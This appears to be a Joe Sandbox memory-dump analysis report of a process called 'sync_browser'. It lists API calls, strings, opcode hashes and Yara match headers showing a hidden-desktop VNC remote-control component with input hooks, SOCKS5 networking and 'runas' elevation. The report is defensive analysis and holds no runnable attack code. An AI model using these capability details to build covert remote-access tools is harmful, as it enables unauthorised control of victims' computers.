• vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF7E50A31DE
• vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF7E50A319A
• vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF7E50A321D
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
• String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
APIs
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135A72
• malloc.LIBCMT ref: 00007FF7E5135ADB
• MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135B0F
• LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135B36
• LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135B7E
• malloc.LIBCMT ref: 00007FF7E5135BDB
  • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
  • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
  • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
  • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
  • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
• LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135C10
• WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135C50
• free.LIBCMT ref: 00007FF7E5135C64
• free.LIBCMT ref: 00007FF7E5135C75
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
• String ID:
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
• String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: inet_addr$connectgethostbynamehtonssocket
• String ID: 0123456789.
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
• String ID: ConsoleWindowClass$tty
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Similarity
• API ID: CriticalSection$CursorEnterLeave$Rect
• String ID: ^
Strings
• HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7E507A7E7
• HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF7E507A726
• HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF7E507A738
• HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF7E507A7AC
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastParametersSystem
                                                                      • String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
                                                                      • API String ID: 2777246624-2146332292
                                                                      • Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                      • Instruction ID: 7fb3f6277455e54e406052debf1dd6fb425db0db44cb78b2f85f802db5569456
                                                                      • Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
                                                                      • Instruction Fuzzy Hash: DE419435E0868A8AE724EF24F9507B9B361FB44B48F840137EA8D87A58DF3CE555C712
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileInfoLastSizeVersion
                                                                      • String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
                                                                      • API String ID: 752140088-134519983
                                                                      • Opcode ID: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
                                                                      • Instruction ID: 1ee7bb67ffa0b2598f1e360a76dd7288a6ab7401837718dd3ccebc6136c5febf
                                                                      • Opcode Fuzzy Hash: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
                                                                      • Instruction Fuzzy Hash: DB21C565B08A4A81DA10BB66B8102A9E3A0EF85FD4F841432DE4C8765CEE7CD585C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                                      • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                      • API String ID: 3622578367-539335655
                                                                      • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                      • Instruction ID: db7ba2d6cc6fc00ecb935209450e6ec01ffed6add7bd6b850dc073615f922d81
                                                                      • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                      • Instruction Fuzzy Hash: 4C214B62A085CA96F65CBB78E9643F9A391BF44B41FC84437E61EC6095DF3CA464C232
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                      • String ID:
                                                                      • API String ID: 3646291181-0
                                                                      • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                      • Instruction ID: 28b6b029ccf8cd5ff9311654b1edecb2e1bfcd3df8490ec7cce600862f5a80f8
                                                                      • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                      • Instruction Fuzzy Hash: 2F51A726A08289C6F710AF29E460779A790EB45F94F944933EA1D877CDDF3CE4819722
                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FF7E512AD95
                                                                        • Part of subcall function 00007FF7E51377D0: _amsg_exit.LIBCMT ref: 00007FF7E51377FA
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512ADC8
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512ADE6
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512AE26
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512AE40
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E512AF59,?,?,00000000,00007FF7E51377FF), ref: 00007FF7E512AE50
                                                                      • _initterm.LIBCMT ref: 00007FF7E512AE90
                                                                      • _initterm.LIBCMT ref: 00007FF7E512AEA3
                                                                      • ExitProcess.KERNEL32 ref: 00007FF7E512AEDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                                      • String ID:
                                                                      • API String ID: 3873167975-0
                                                                      • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                      • Instruction ID: c9aba757f1e395e339dde808fadc594fc81a30c1ea7410022ebae0a5f183c097
                                                                      • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                      • Instruction Fuzzy Hash: 3D41AE25A0964A81E610BB11F860338E395BF88F94F940037DA4EC7B6DEF7CE455C722
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                      • String ID:
                                                                      • API String ID: 4242051881-0
                                                                      • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                      • Instruction ID: 1e2224b2df27e7d2405805c72d13f5445e8a8243cb1fcd0dbe24ee21ae8ebe3e
                                                                      • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                      • Instruction Fuzzy Hash: A611EC25A06A0E81EF15BF71E875778A364FF44F15B841032C90E82269DF3DD845C762
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 186452611-3977938048
                                                                      • Opcode ID: cc79c19bcc8b5f7d48aa2344a5fb395df6ce65062b0848f58c75dc6cee1c68c6
                                                                      • Instruction ID: 819ade1757e0d0cdddbdd392ae9508a4db0e0efad25188664885e9365a3b5430
                                                                      • Opcode Fuzzy Hash: cc79c19bcc8b5f7d48aa2344a5fb395df6ce65062b0848f58c75dc6cee1c68c6
                                                                      • Instruction Fuzzy Hash: 09A1C522A086C585E750AB39C4687FEA7A1FBC5F54F894033EA4C877A9CF39D445C722
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                                      • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                                      • API String ID: 3897446562-3886131270
                                                                      • Opcode ID: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                                      • Instruction ID: d610f036a3770726f6453a47ad6bbb04ad031581d649dec3280f92e077d4abb8
                                                                      • Opcode Fuzzy Hash: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                                      • Instruction Fuzzy Hash: 5C819322608B8999EB10DB38D4203EDB761FB85BA4F904337EA6D43AD9DF78D505C721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Version$AddressHandleInfoModuleProcSystem
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 335284197-192647395
APIs
• GetDeviceCaps.GDI32 ref: 00007FF7E50A0113
• GetDeviceCaps.GDI32 ref: 00007FF7E50A0140
• GetDeviceCaps.GDI32 ref: 00007FF7E50A016D
  • Part of subcall function 00007FF7E507A040: OpenInputDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A07A
  • Part of subcall function 00007FF7E507A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7E507A083
  • Part of subcall function 00007FF7E507A040: GetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A08B
  • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0A6
  • Part of subcall function 00007FF7E507A040: MessageBoxA.USER32 ref: 00007FF7E507A0B7
  • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0C2
  • Part of subcall function 00007FF7E507A040: CloseDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0CB
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
• String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
• API String ID: 3271485511-23260621
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: ExecuteFileForegroundModuleNameShellVersionWindow
• String ID: -delsoftwarecad$p$runas
• API String ID: 397093096-3343046257
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
• String ID:
• API String ID: 113790786-0
APIs
  • Part of subcall function 00007FF7E51337C4: GetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337CE
  • Part of subcall function 00007FF7E51337C4: FlsGetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E51337DC
  • Part of subcall function 00007FF7E51337C4: FlsSetValue.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133808
  • Part of subcall function 00007FF7E51337C4: GetCurrentThreadId.KERNEL32 ref: 00007FF7E513381C
  • Part of subcall function 00007FF7E51337C4: SetLastError.KERNEL32(?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19,?,?,?,00007FF7E512748C), ref: 00007FF7E5133834
  • Part of subcall function 00007FF7E51332EC: Sleep.KERNEL32(?,?,?,00007FF7E51337F7,?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19), ref: 00007FF7E5133331
• _errno.LIBCMT ref: 00007FF7E5139D9C
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5139DA7
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
• String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
• API String ID: 1962487656-880385205
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
• String ID: SOCKS5_AUTH
• API String ID: 788663964-1698957378
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
• String ID: 0123456789.
• API String ID: 1515065793-2088042752
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
Yara matches
Similarity
• API ID: CriticalSection$EnterInitializeLeaveSleep
• String ID: keyEvent$start_event$stop_event
• API String ID: 2894921085-1979648887
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                      • String ID:
                                                                      • API String ID: 3112530957-0
                                                                      • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                      • Instruction ID: bbd201cbf71082e321e5627f991e44af7f9a560c2d5e366bed06fc1363da91a2
                                                                      • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                      • Instruction Fuzzy Hash: F24117769086C5CAE324DF38E454399BBA0F748B08F44593AEF999B749EB38D504CF21
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E5127BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7E50C3771), ref: 00007FF7E5127BFE
                                                                      • GetLastError.KERNEL32 ref: 00007FF7E50C3790
                                                                      • SetLastError.KERNEL32 ref: 00007FF7E50C37B2
                                                                      • FormatMessageA.KERNEL32 ref: 00007FF7E50C37EB
                                                                      • sprintf.LIBCMT ref: 00007FF7E50C3804
                                                                        • Part of subcall function 00007FF7E512B240: _errno.LIBCMT ref: 00007FF7E512B258
